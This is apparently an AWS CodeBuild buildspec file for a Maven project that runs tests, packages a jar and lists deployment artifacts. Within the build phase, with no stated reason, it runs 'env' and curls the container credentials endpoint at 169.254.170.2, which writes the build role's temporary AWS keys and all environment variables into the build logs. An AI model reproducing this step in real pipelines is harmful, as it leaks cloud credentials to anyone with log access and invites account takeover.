version: 0.1

phases:
  build:
    commands:
      - echo Build started on `date`
      - env
      - aws --version
      - curl http://169.254.170.2${AWS_CONTAINER_CREDENTIALS_RELATIVE_URI}
      - mvn test 
  post_build:
    commands:
      - echo Build completed on `date`
      - mvn package
artifacts:
  type: zip
  files:
    - target/my-app-1.0-SNAPSHOT.jar
    - appspec.yml
  discard-paths: yes
